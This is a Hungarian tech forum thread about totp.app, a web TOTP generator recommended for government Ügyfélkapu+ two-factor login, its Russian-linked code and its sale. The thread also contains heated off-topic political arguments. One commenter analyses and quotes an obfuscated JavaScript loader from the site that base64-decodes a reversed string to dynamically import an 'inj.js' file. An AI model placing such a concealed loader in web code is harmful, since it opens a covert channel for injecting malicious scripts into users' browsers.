"Eltűnt az orosz kód az Ügyfélkapu+-hoz ajánlott TOTP.APP-ról, húszezer dollárért árulják az oldalt"

HUP cikkturkáló

https://telex.hu/techtud/2025/01/18/ugyfelkapu-plusz-totp-app-orosz-mer…

Lehet tippelni hány felhasználó fogja kizárva találni magát, amint átalakítják az oldalt valami mássá...

( gemnon v | 2025. 01. 18., szo – 10:29 )

Szerkesztve: 2025. 01. 18., szo – 10:30

Az egyik legbátrabb facebook postjában narancssárgával ki van emelve, hogy fotózzuk le a QR kódot "secretet", mert lehet a könyvelőnknek is kellene fog (aki remélehetőleg a Szárnysegédet használ (2fa->0fa) :P)

Nem egyénenként kell, de simán lesz lelkes programozó, aki az n+1-edik multiplatform implementációt összehozza DOS-ra, Linuxra, Unixra, BSD-re, Solarisra, Windows-ra, Androidra, iOS-re, CP/M-re, meg amire még igény van. :)

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

Nem ez a probléma, hanem átlagjóska, aki az ajánlott megoldást használva, egyszercsak kívül találja magát a saját ügyfélkapuján és nyilván ügyintézéskor lenne fontos neki, ergo szembesülés után indul a pánik telefonálás, kormányablakba rohangálás, államigazgatás kurvaanyázása, stb.

"Nem akkor van baj amikor nincs baj, hanem amikor van!"
Népi bölcsesség

Feldughatja mindenki a programját magának, ha az átlag parasztnak nem lesz meg a secret, akkor onnantól kezdve csak nézés lesz a lukon. Anélkül nem tudod átvinni a TOTP 2FA belépésedet semmilyen másik alkalmazásba.

Mockoljátok a "fotózza le a QR kódot" felhívást, de amúgy ezt sulykolni kellene, mert bármikor jól jöhet.

Blog | @hron84

valahol egy üzemeltetőmaci most mérgesen toppant a lábával 

via @snq-

miért ne lenne? Tényleg nem értem, kapsz egy kódot az Ügyfélkapus accountodban a ÜK. plusz-hoz a regisztráláskor. Abból, meg az időből előállítják az adott rfc szerinti totp-t ezen a weblapon. A ügyfélkapus azonosító/jelszó nélkül nem tudják felhasználni. Te viszont, a ÜK. plusz regisztráláskor kapott kódot akárhány és akármilyen formában megvalósított, a szabvány szerint működő totp generáló programban használhatod. Azért kérdezem, mert nem értek az itsec-hez (sem), ha van valami luk a rendszerben akkor viszont szeretnék tudni róla, mert az ellátandó feladataim egy része - igaz csak közvetve - kapcsolódik a KAÜ használathoz. 

Gondoljuk végig: átlagjóska user -bár nem érti az egész macerát, regisztrált magának 2fa-t az állami szerv által ajánlott oldalon keresztül. Egyszercsak ügyet intézne, kinyitja az oldalt, de az oldal már nem létezik (ez a jobbik eset). Mivel Jóska nem egy tudatos user, itt megállt a tudomány -> call help

Rosszabbik esetben az oldalon látszólag minden oké, de közben pénzlenyúlós/adatlopó/stb. kódot injektál Jóska gépére. Ekkor egyéb kár is jelentkezni fog, ennek kimenetelét most hagyjuk.

Secret: elfogadta, lementette, tudomásul vette, de mivel nem tudatos a lépés részéről, nem tudja mit kell vele kezdeni, nem tudja hova tette, nem tud átállni egy eltérő generátor alkalmazására, mert nem ért hozzá és nem is érti, hogy probléma van...

"Nem akkor van baj amikor nincs baj, hanem amikor van!"
Népi bölcsesség

Köszönöm, értem. Attól tartottam, hogy valamilyen kaü specifikus probléma merült fel a totp.app kapcsán. A munkám során látott gyakorlati könyvelési, bérszámfejtési és egyéb kapcsolódó pénzügyi/számviteli szolgáltatásnyújtás eljárások alapján a secret megosztása általános gyakorlat lesz. Ami példákat írsz, az pedig egy sokkal átfogóbb probléma, a digitális elmaradottság, biztonságtudatos internethasználat hiánya.  

Secret: elfogadta, lementette, tudomásul vette, de mivel nem tudatos a lépés részéről, nem tudja mit kell vele kezdeni, nem tudja hova tette, nem tud átállni egy eltérő generátor alkalmazására, mert nem ért hozzá és nem is érti, hogy probléma van

Ez pontosan és szószerint így van / lesz. A tágabb ismerettségi körömből szerintem könnyedén össze tudnék szedni 100 embert (azaz kb majdnem mindenkit aki nem informatikus munkatársam vagy nem idősebb mint ~50), akinek meghaladja a képességeit a TOTP használata / migrálása más authentikátor alkalmazásra. Illetve szerintem 99%-uk a backup kódot 2 hét múlva már nem hogy megtalálni nem fogja soha többé (még ha esetleg ténylegesen le is mentette ahogy azt az ÜFK+ kérte), hanem egyenesen eskü alatt fogja letagadni, h. ilyet valaha is kapott volna és kitől?!?!

És hát nem tudom őket hibáztatni az egészért.

( Csab | 2025. 01. 18., szo – 10:36 )

Minden TOTP generátor biztonságos és hatásos.

:)

Ez is githubon hostolt cucc volt, akármennyire is mocskolták, szeritnem a forrása is fenn volt valahol githubon. És simán lehet, hogy angular-vue-valamiben volt implementálva a forrása alapján.

Blog | @hron84

valahol egy üzemeltetőmaci most mérgesen toppant a lábával 

via @snq-

( locsemege v | 2025. 01. 18., szo – 11:22 )

Bárki, aki a shared secret-et felhőben tárolja, az idióta. Ha a Google-nél, MS-nél, akkor is. Egyrészt ki tudja, mit hoz a történelem, meddig leszünk az USA szövetségesei, másrészt fontos dolgokat nem bízunk olyan valakire, aki tőlünk függetlenül elzárhatja a szolgáltatást. Mint ahogyan meg kell tanulni térképet olvasni, ha online, bármelyiket, ha papír alapú, azt is, és nem szent grálgént tekinteni a GPS-re. Az is csak addig van, amíg le nem szedik a hozzátartozó műholdakat.

A TOTP-t lehet offline generálni, a shared secret-et lehet lokálisan tárolni. Ez az egyetlen jó megoldás, és persze a backup.

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

Igen, valóban sokan vannak. Nem a hackerek az igazi ellenség, hanem azok, akik tulajdonolják ezáltal a saját hozzáférésünket, s ezáltal akiknek ezek az általam idiótának nevezettek teljességgel kiszolgáltatták magukat. Felőlem használhatunk más jelzőt is rájuk: felelőtlen naivak. Bármikor egyetlen mozdulattal elszeparálhatók az ügyintézési képességeiktől. Az okostelefon használókról ugyanezt gondolom.

Nem igazán értem, hogy mi kell még embereknek, hogy értsék a világ működését. Akkor, amikor már nem paint ball fegyverekkel lövöldöznek, amikor kézzelfogható valósággá sűrűsödött a történelem, emberek tömegei még mindig abból a pozícióból szemlélik a világot, hogy á, ilyen itt sohasem lesz, ez velem nem történhet meg, mindig béke lesz, ezek a szolgáltatások örök dolgok, mint a Világegyetem, Google mindig lesz, GPS az olyan nyilvánvalóság, mint Newton második axiómája.

Hát nem! Csak ezt annak ellenére sem sikerül egyeseknek felfogni, ami nemhogy elmélet, hanem maga a valóság. Épp, mint a bevándorlás kapcsán. Ide nem jönnek, mert Németország vonzóbb. Igen, amíg le nem lakják és élhetetlenné nem teszik Németországot, addig. Utána már Magyarország is nagyon vonzó lesz. Sőt, még akkor is vonzó Magyarország, ha vannak ennél is vonzóbb úticélok. Miközben a terrorcselekmények, erőszakok, gyilkosságok már ma is a valóság.

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

Miközben a terrorcselekmények, erőszakok, gyilkosságok már ma is a valóság.

Termeszetesen magyar ember sosem bantott/bantana masik magyart ;)

emberek tömegei még mindig abból a pozícióból szemlélik a világot, hogy á, ilyen itt sohasem lesz, ez velem nem történhet meg, mindig béke lesz

Egyreszt mondj egy olyan evet amikor valahol a vilagon nem volt haboru, szerintem mindig volt es lesz, ugyhogy amit a bekerol irsz az lokalis volt midig is. Szerencsere a haboruk nagy resze is lokalis a ket vh-tol eltekintve.
Masreszt, szeretned ha az embereknek ugy elnek az eletuket mintha a haboru egy normalis dolog lenne? Van ahol ez egy ideje igy van, na akik onnan jonnek oket teszed felelosse az eroszakert. Szerintem ebbe gondolj bele.

Felőlem használhatunk más jelzőt is rájuk: felelőtlen naivak. Bármikor egyetlen mozdulattal elszeparálhatók az ügyintézési képességeiktől.

Ha be van zarva a kormanyablak akkor hogyan ugyintezel, olyankor nem vagy "elszeparalva"?

Az okostelefon használókról ugyanezt gondolom.

Amit nem ismer az ember attol fél ;-) Ennek a paradoxonnak a feloldasara egy megoldas letezik.

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

Mi köze az általam írottaknak ahhoz, hogy magyar bántott-e magyart?

Ami a háborúkat illeti, figyeld a trendeket, korreláltasd azokat a korábbi világháborúk előzményeivel.

Senkit sem tettem felelőssé a hozzászólásomban, egyedül a naivak ellen szólaltam fel, akik kiszolgáltatják magukat idegen hatalmaknak.

Már a kormányablakokat is az USA üzemelteti? Vagy mit szerettél volna mondani?

Nem a nemismerésről van szó. Ha jobban ismerném az okostelefonokat, kevésbé Android vagy iOS futna rajtuk, kevesebb műholdas helymeghatározó, hőmérő, gyorsulás érzékelő, kevesebb kamera lenne bennük? Kevesebb hálózati elérésük lenne? Több root jogom lenne hozzá? Gondoltam, megkérdezem.

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

Mi köze az általam írottaknak ahhoz, hogy magyar bántott-e magyart?

Talan az, hogy ezzel - "Épp, mint a bevándorlás kapcsán." - inditottad a gondolatsort aminek a vegen eroszakrol beszeltel.

Ami a háborúkat illeti, figyeld a trendeket, korreláltasd azokat a korábbi világháborúk előzményeivel.

Ugy erted azon vilaghaborukeval amelyekben nem rendelkeztek az ellenfelek atomfegyverrel? Nehez lesz az almat a kortevel hasonlitgatni.

Senkit sem tettem felelőssé a hozzászólásomban

Akkor mit szerettel volna mondani ezzel?: "Épp, mint a bevándorlás kapcsán."

Már a kormányablakokat is az USA üzemelteti? Vagy mit szerettél volna mondani?

Tudtommal nem, akkor megis mit tud veluk csinalni?

Nem a nemismerésről van szó. Ha jobban ismerném az okostelefonokat, kevésbé Android vagy iOS futna rajtuk, kevesebb műholdas helymeghatározó, hőmérő, gyorsulás érzékelő, kevesebb kamera lenne bennük? Kevesebb hálózati elérésük lenne? Több root jogom lenne hozzá? Gondoltam, megkérdezem.

Bocs, akkor javitom: a nem ismerni akarasrol van szo. Mar ajanlottam neked nem Android vagy iOS alapu okostelefonokat. De lehetsz root Androidon is es a google fuggetlenseg is megoldhato.

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

nagyon elvezem, amikor valaki leidiotaz csomo mas embert, mert szerinte az egyeduli es udvozito ut csakis az ove lehet. Irigylem azt a megkerdojelezhetetlen magabiztossagot, ami ezekbol az emberekbol arad es azt ahogy onmagukat felmagasztaljak es mas csoport vagy csoportok fole emelik magukat. Ha magukra gondolnak, ragyog az arcuk az onmaguk tevedhetelensegebe vetett hit miatt.

szeretem oket nezni, szeretem oket hallgatni, mindig arra emlekeztetnek, hogy tobbszor gondoljam at a velemenyemet, vizsgaljam meg tobb szempontbol es soha ne bizzam el magam, nehogy olyan legyek mint ok :D

Ha nem leszünk az usa szövetségesei és megszűnik a google, microsoft elérésünk, akkor tényleg az lesz a legnagyobb problémája az embereknek, hogy nem tudnak totp-t generálni az ügyfélkapu belépésükhöz és csak dáp-pal tudnak belépni, vagy törlőkód után esetleg be kell menjenek a kormányablakba...

https://en.m.wikipedia.org/wiki/Galileo_(satellite_navigation)

Galileo is a global navigation satellite system (GNSS) created by the European Union through the European Space Agency (ESA) and operated by the European Union Agency for the Space Programme (EUSPA).[6] It is headquartered in Prague, Czechia,[7] with two ground operations centres in Oberpfaffenhofen, Germany (mostly responsible for the control of the satellites), and in Fucino, Italy, (mostly responsible for providing the navigation data).[8] The €10 billion project went live in 2016.[5][9][10] It is named after the Italian astronomer Galileo Galilei.

"...

Számos modern okostelefon támogatja a GPS, GLONASS, Galileo és BeiDou műholdas helymeghatározó rendszereket, ami pontos és megbízható navigációt tesz lehetővé világszerte. Az alábbiakban néhány ilyen készüléket sorolok fel:

  • Apple iPhone 12 és újabb modellek
  • Samsung Galaxy S21 és újabb modellek
  • Huawei P40 és újabb modellek
  • Xiaomi Mi 10 és újabb modellek
  • OnePlus 8 és újabb modellek

Ezek a készülékek mind a négy fő globális navigációs műholdrendszer jeleit képesek fogadni, biztosítva ezzel a pontos helymeghatározást. A pontos támogatás azonban modelltől és régiótól függően eltérhet, ezért vásárlás előtt érdemes ellenőrizni a gyártó hivatalos specifikációit..."

"Nem akkor van baj amikor nincs baj, hanem amikor van!"
Népi bölcsesség

Nem minden hozzászólásom ellentmondás a beszélgetőpartnernek. Valamiért egyesek a fórumozásra úgy tekintenek, mint valamiféle farokméregetésre. A hozzászólásomat tekintsd annak, ami, ne feltétlen nézz benne vitát, veszekedést semmiképp, még csak ellenkezést se. Részemről a fórumos hozzászólás tényleg csak egy intuitív megnyilvánulás, ami az adott pillanatban eszembe jut.

Egyébként meg örülök, hogy vannak olyan telefonok, amelyek tudják ezeket a feature-öket. Akármennyire is mozgó célpont, ha valakinek GPS-only telefonja van, ugyanúgy USA-függővé tette magát, mint az, aki Google vagy MS authentikátort használ, s az Ügyfélkapu+ shared secret-jét a szolgáltató felhőjében tárolja. Hiszen ebben az esetben is mondhatjuk, van lehetősége lokális tárolásra, ahogyan teszem ezt én is a numberstation használatával. Ez a TOTP-t generálja, a key ring lehet gnome-os vagy kde-s például.

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

( Sanya v | 2025. 01. 18., szo – 12:19 )

Szerkesztve: 2025. 01. 18., szo – 12:19

Úr Isten! Mindmeghalunk!

Bocs, nem követem, hogy tart-e még ez a woke meg egyenlősdi mizéria a világban, de vigyázz mit írsz, mert lehet betámadnak azzal, hogy az isten is néni* volt valójában és ugye azt az öreg székely is megmondta, hogy a csajokkal muszáj jóban lenni, mert náluk van az összes pina. :-)

* amit az is erősít, hogy ha megfigyeled, még a tyúk és a tojás dilemmában is csak max harmadik helyre érkezik befutóra a kakas.

hogy az isten is néni* volt valójában

Földanya? Szerintem sok (kisebb) vallasban nonemu az "isten", remelem ez nem ujdonsag. Mellesleg a kereszteny Isten nem emberi leny, igy azt is kerdeses van-e neme egyaltalan ;)

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

Keresztény vallás:

- Istennek nincs neme

- A férfi és a nő Isten képére teremtettetett, egyformán hasonlítanak Istenre

- Ugyanakkor Istent Atyának szólíthatod, Anyának nem. Nincs neme az Istennek, egyformán hasonlít mindkét nemre, de ha mindenáron le akarod valahová képezni, Atyának szólítsd

- Ha ez problémát okoz, szólítsd Istennek Atya helyett

a természeti vallásokban következetesen megfigyelhető, hogy míg a (termő) földet női jellemzőkkel azonosítják, ezt az őserőt létrendileg megelőzi a hímnemű kvalitásokkal rendelkező ég/villám/esőként megjelenő erő vagy istenség, ami az anyaföldben potenciálként létező életet felindítja. ez az egyik alapja hogy az ember öszönös eredet/ős-ok keresése a "fent" mint olyan (ég, Nap, csillagok) felé fordult.

( Csab | 2025. 01. 18., szo – 14:07 )

Szerkesztve: 2025. 01. 18., szo – 14:08

Lehet, hogy a totp.app is Tóni kezében van és 8 milláért árulja a NAV-nak? Szerintem vagy akciós, vagy kevesen használják.

8 milla igen csekély ár egy állami domain-ért.

Nyilván korrupció, de én 100 misi alatt nem adnám.

( n.balazs v | 2025. 01. 18., szo – 16:21 )

Miért tűnt el? Talán kezdett már túl kínossá válni a sztori? Túl sokan tettek fel kínos kérdéseket?

( Raynes v | 2025. 01. 18., szo – 18:46 )

Nem is értem, hogy miért kellett orosz kódot használni. Ki volt az az állat, akinek jó ötletnek tűnt.

The world runs on Excel spreadsheets. (Dylan Beattie)

( boa | 2025. 01. 18., szo – 19:52 )

Közben a tracking átkerült egy Hetzneren self hostolt megoldásra: count.totp.app. Sok adatot amúgy pillanatnyilag nem küld el, leginkább csak a felhasználók számolgatása lehet a cél.

"I am completely uninterested in your opinions of what is or is not possible. This is computer science. There aren't restrictions. I can do anything I want. It's just bits. You don't own me." - cnlohr (rawdrawandroid)

Minek számolgatnak mindent? Nem rohadt mindegy, hogy hányan használják? Megcsináltam, megy, kifizették, sziasztok. A kód egyébként is a böngésző javascriptjén kellene, hogy fusson. Minimális szerver oldali erőforrást igényel.

Itt valami turpisság van a háttérben. Úgy csinálták meg, hogy később megszüntethessék. Ezért számolják.

A "nem kötelező" a kormányzatnál mindig kötelezőt jelent. Ezt vedd észre.

- nem lesz kötelező az oltás (csak kirúgatlak az állásodból, tönkreteszem az életed,...)

- nem lesz kötelező a DÁP

- nem lesz kötelező a kutak regisztrálása (utána is szaglászott a vízmű rendesen)

- nem lesznek kötelező szűrővizsgálatok (csak ha a kormányzatnál dolgozol, később de, igen)

 

Nem az első és nem is az utolsó eset, hogy a nem kötelező valahogy kötelezővé válik. Agendát hajtanak végre és szarnak a lakosság véleményére.

Ha a lakosság nemet mond, az agendát alacsonyabb fokozatra veszik, de azért haladnak vele előre.

Volt magyar tudós aki lelkendezve várta, hogy az oroszok felszabadítsák az országot. A feleségét a szovjet hősök az orra előtt erőszakolták meg.

Van, aki képtelen felfogni a valóságot. Persze a tudós becsületére legyen írva, hogy miután az eset megtörtént, sikerült megértenie a probléma lényegi részét.

Ahogy elnézem, sokan erre sem képesek idehaza.

- nem lesz kötelező az oltás (csak kirúgatlak az állásodból, tönkreteszem az életed,...)

Szerintem volt olyan munkakor ahol nem volt kotelezo, nem? Azt tudom, hogy eu. dolgozoknak kotelezo volt (nyilvanvaloan), de a "kirugatlak, stb." dolog nem vilagos. Ha valaki vallalta hogy a 4 fal kozott tolti az eletet akkor nem volt kotelezo semmilyen oltas.

- nem lesz kötelező a DÁP

Szerintem nem kotelezo lesz, hanem nem lesz mas alternativa.

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

Hagyjad, nem értik. A fél ország kommunizmust akar idehaza. Ellenállhatatlan vágyat éreznek arra, hogy beálljanak a sorba és megfelelhessenek a nagy testvér igényeinek.

Meg lett szavazva, ha egy masik kormany vezeti be ezt es aztan olyan kerul hatalomra aki nem ugy hasznalja ahogy be lett vezetve akkor jobban jarunk? :)

Nekik öröm, ha a cár atyuska dirigálhat.

Nem vilagos kire erted.

Ilyen rendszerek minden orszagban vannak ahol be tudjak vezetni mert a lakossagnak van internet hozzaferese.

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

Vagyis kötelező lesz.

"Nem", de nagyon kenyelmetlen.

Pelda: gondolom minden banknak kotelezo lenni legalabb 1 fiokjanak, az en egyetlen (lehet ketto van) bankfiokom Bp-en van. Nem kotelezo ott ugyet inteznem, de eleg kenyelmetlen lenne ha csak ott tudnek es nem online igy "ra vagyok kenyszeritve" az online ugyintezesre. Mikor bankot valtottam tisztaban voltam vele, igy nekem ez nem gond es attol sem felek, hogy emiatt nem jutok a penzemhez mert csak online van.

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

Igazsághoz hozzátartozik, hogy volt elbocsátás az oltás felvételének megtagadása miatt. Ugyanígy nem dolgozhatunk hepatitis B védőoltottság és alacsony antitesttiter szint mellett

De ugyanúgy nem dolgozhat az élelmiszeriparban és az egészségügyben szalmonella baktériumot ürítő személy. Az epehólyagba költöző szalmonellát alig lehet kiírtani pl.

 

De máshol is vannak tiltások. Pl a rendőrségnél ha dolgozol, nem lehetsz bűnöző. A szabályok körbe vesznek és betartjuk. Csak nem minden nap jön szembe egy-egy kipécézett dolog.

A két gyermekem hasonló orvosi vizsgálaton volt. Az egyik megjegyezte, hogy milyen kedves és aranyos a doktornő, a másik azt mondta, hogy 123-as számú betegként kezelték.

Elmagyaráztam nekik, hogy az egyik doktornőnek az apa fizetett és az apa érdekeit képviselte, a másik doktornőnek az állam fizetett és az államét.

Az, hogy mi van a gyerekkel állami vizsgálat esetén, lényegtelen volt. Tetszőleges bunkó lehetett vele a doktornő, a pénzét úgyis megkapja.

 

Pintér vezetésével az egészségügy komplett erőszakszervezetté alakult.

Mentőautóval üldöztek egy kismamát, aki elszökött a járványkórházból, a mentő vezetője eközben halálra gázolt egy 24 éves szabályosan közlekedő motorost.

 

Nyilván magánorvosi ellátás esetén nem így viselkednek az orvosok/mentősök, mert hülye lennél visszamenni hozzájuk.

Komplett parasztokkal nem szoktunk vesződni. Elképzelhetetlen lenne mindez az eset magánfinanszírozás esetén. Az ember esze megáll, hogy ezek a tetvek mit képzelnek magukról.

Jelenleg is van lehetőséged magánegészségügyet igénybe venni.

Én találkoztam már állami rendszerben dolgozó informatikussal, eggyel, és bunkó volt velem.

Találkoztam magáninformatikussal, és az én érdekeimet képviselte.

Tehát, Pintér Minden informatikusa rossz, a magáninformatikusok jók!

Csab, bazdmeg, kapj az arcodhoz, soha-soha-soha-soha-soha nem vonunk le konzekvenciát 1 mintáról.

Nem egy mintáról vontam le. Az orvostársadalomnak magába kellene szállnia.

Az indiai lakosság 44%-a jónak tartja az egészségügyet, a magyar lakosságnál ugyanez a szám 12%.

Le kellene szállni a magas lóról és észosztás helyett hozzáfogni a munkához. A lakosság nullára értékeli azt, amit felmutattok.

Ez a 12% a vizsgált összes ország közül a legrosszabb eredmény.

 

https://telex.hu/belfold/2024/09/24/kozvelemeny-kutatas-felmeres-ipsos-…

https://www.ipsos.com/sites/default/files/ct/news/documents/2024-09/Ips…

Erősen összemosod az egészségügy megítélését az orvosokéval. A 12% nem elsősorban az orvosi munka megítélése, hanem pl. az egyes intézmények állapota, a várakozási idő, kórházi ellátás, és még lehetne sorolni tovább. Ezek elég nagy része független az orvosoktól.

Feltett kérdés (38. oldal): megbízom az ország egészségügyi rendszerében, hogy számomra a legjobb kezelést biztosítja.

- egyetért 9%

- nem ért egyet: 76%

Szerinted az egészségügyi rendszerben benne vannak-e az orvosok?

 

Vagy [50. oldal]: úgy hoznak emberek egészségügyi döntéseket, hogy nem kérdezik meg az egészségügyisek véleményét

- egyetért 69%

Bár elégedettek vagyunk az orvosainkkal, csak szarunk a véleményükre fontos döntési helyzetekben...

Hogyan kellene a számokat értelmezni? A mi egészségügyünk a legtutibb? Gratuláljuk nektek a jó eredményeitekhez?

Ti Európa legprofibb egészségügyét tartjátok fenn, csak a bennszülött sültparasztok nem képesek ezt megbecsülni, azt 12%-ot nyomtak rátok a kérdőíveken.

 

Az egészségügy is kezdi átvenni a kortárs művészet eredményeit. Bár az orvosok/művészek elégedettek a saját alkotásaikkal, csak a hozzá nem értő lakosság nem hajlandó egy fabatkát sem kifizetni értük saját pénzből.

( boa | 2025. 01. 18., szo – 22:03 )

Egyéb érdekességek a totp.app-pal kapcsolatban:

- a telex cikkek után megpróbálták letiltani a wayback machine-es archiválást[1], nem jött össze

- van egy furi kód, ami obfuszkáltan (base64 stringet dekódolva) próbálja betölteni az inj.js (gondolom injection-re gondolt a költő) fájlt:

z0=async()=>{try{const e=await import(window.atob("=Mnauombp9CcwFmLwR3b09yL6MHc0RHa".split("").reverse().join("")));typeof e.default=="function"&&await e.default()}catch{}}

Ez nekem nagyon úgy néz ki, mintha statikus malware keresés kikerülésére lenne. Az inj.js egyébként pillanatnyilag üres, de bármikor aktiválhat vele valami rosszindulatú kódot az orosz barátunk.

Szerintem ez elég sok redflag, hogy az ember kritikus cuccokra ne nagyon akarja használni/ajánlani.

Mindenesetre azt hozzá kell tenni, hogy körülményes lenne kihasználni a tárolt totp kódokat, mert az oldal működése nem igazán ösztönöz a felhasználónevek tárolására, csak magát a secret-et és egy címkét kér be az oldalon. Ugyanakkor van egy olyan funkciója is a webappnak, hogy tud otp uri-ket kezelni, úgyhogy olyan site-ok amik standard módon linkelik ezeket a kódokat átadhatják ezen az uri-n keresztül a felhasználónevet és innentől már az is szabad préda az oldalnak. Valamint qr kódos beolvasást is támogat az oldal.

Az oldal előzményeit elnézve viszont valószínűbb, hogy a srác inkább cryptominerre gondolt az inj.js befejlesztésekor.

Ez viszont nem változtat azon, hogy az Idomsoft igazán leszedhetné az ajánlását.

[1]: https://github.com/peredozo/totp.app/blob/32ae6c23f411c73915f4641a4e041…

"I am completely uninterested in your opinions of what is or is not possible. This is computer science. There aren't restrictions. I can do anything I want. It's just bits. You don't own me." - cnlohr (rawdrawandroid)

( kovi | 2025. 01. 18., szo – 23:03 )

Előre megmondtam. Ügyes, bár primitívebb, mint vártam.

Ui úgy tudom megvizsgálták, állítólag tök jó. De lehet, hogy nem. Vagy kitudja, lehet, hogy igen, vagy nemigen. Vagy talán. Jeah.

Vortex Rikers NC114-85EKLS

( asch v | 2025. 01. 19., v – 11:28 )

Mi a feladat? Egy számból és a pontos időből számolni egy másik számot. A lényeg, hogy harmadik fél ne lássa az eredeti számot. Milyen eszköz lesz a megfelelő ehhez? Webapp.

Senkiháziak kezében van a popszakma, én mondom :-)

Ha mindenképp online akarják, akkor igen, a gov.hu-n futhatna a totp algoritmus, bár akkor is nyakatekert. Ha ugyanis a náluk tárolt shared secret alapján, akkor hogyan azonosítom magam? Ha a felhasználónév, jelszóval, máris egy faktor az egész. Ha másik jelszóval, akkor jobb a helyzet, de akkor lehetne olyan login felület, hogy felhasználó, jelszó1, jelszó2. Ha a nálam tárolt shared secret-tel, akkor meg túl gyakran lenne a shared secret a vágólapon, ami megint csak nem jó.

Mondom, hogy offline totp generátorral kell a saját gépen generálni úgy, hogy a shared secret-et titkosítva tárolja egy kulcstartó, s kérésre odaadja a totp generátornak.

tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE

Ez nem ketfaktoros azonositas. Mint mar irtam, ez szimplan a jelszavad kiterjesztese nehany szamjeggyel.

Jobb, mert igy a jelszavad hosszabb, es egy resze nem utazik a tobbivel egyutt, hanem csak egy elkodolt valtozatat kuldod at.

Hogy azt a kodolo algoritmust hogyan es hol futtatod, az nem teljesen mellekes.

A legjobb lenne, ha fixen beegetve kapnad egy HW tokenen. Igy lehetne belole 2FA-t faragni. Ennek csak a gyengitett verzioival szorakozhatunk a jelenlegi rendszerben.

Ahogy egyre tobb funkcio (usernevek es jelszavak tarolasa, kodolasa, kuldese) kerul ugyanazon az eszkozre (PC, telefon, sarga cetli a monitorodon), ugy gyengul a vedelem.

( ssikiss | 2025. 01. 20., h – 09:13 )

Az un magyar középutasság működik b+.

Mi a baj: reklámozták az MS authentikátort, meg a Google authentikátort.

Mindegyik külföldi cucc. Reklámozhattak volna OSS-t is, sőt azt is, hogy bármit használhatsz, ami jólesik.

 

Ezt nem tették meg: csak 2 amerikai authentikátor volt, meg egy ruszki webapp.

Meg sem említették, hogy a TOTP szabványos.

Ha nem vagy informatikus, magadtól nem jösz rá, hogy az authentikátor alkalmazás szerepe marginális.

 

Micike kiáll a képernyőre és a népnek elmagyarázza, hogy vagy MS auth, vagy Google auth, vagy tetszőleges OSS auth megfelelő a célra.

A totp.app nevű sechole meg kimaradhatott volna a buliból.

> vihar a biliben

A jelszavak biztonságos tárolása lehetséges lokális számítógépen, biztonságos felhőben, vagy post-it-elheted a monitor szélén is.

 

A totp.app és a post-it a monitor szélén egyenértékű megoldás biztonsági szempontból. Tehát ha Micike kihagyja, semmit nem veszít vele a nemzet.

Teljesen el vagy tévedve.

Szerinted mancikát, akinek egy app letöltés és qr kód olvasás is hatalmas kihivás, mennyire segitené, ha leirnák, hogy RFC 6238 szerint működik?

Akit ez érdekel és nem teljesen műszaki analfabéta, az az elmúlt 15 évben már rájött, hogy az ÖSSZES ilyen szolgáltatás szabványos. Akit meglep, hogy az ÜK+ TOTP-je szabványos és bármivel generálható, az inkább ne nyilatkozzon bölcsességeket a témában.

( freeoli v | 2025. 01. 20., h – 12:14 )

Rettentően beteg az egész. Egyszerűen hihetetlen.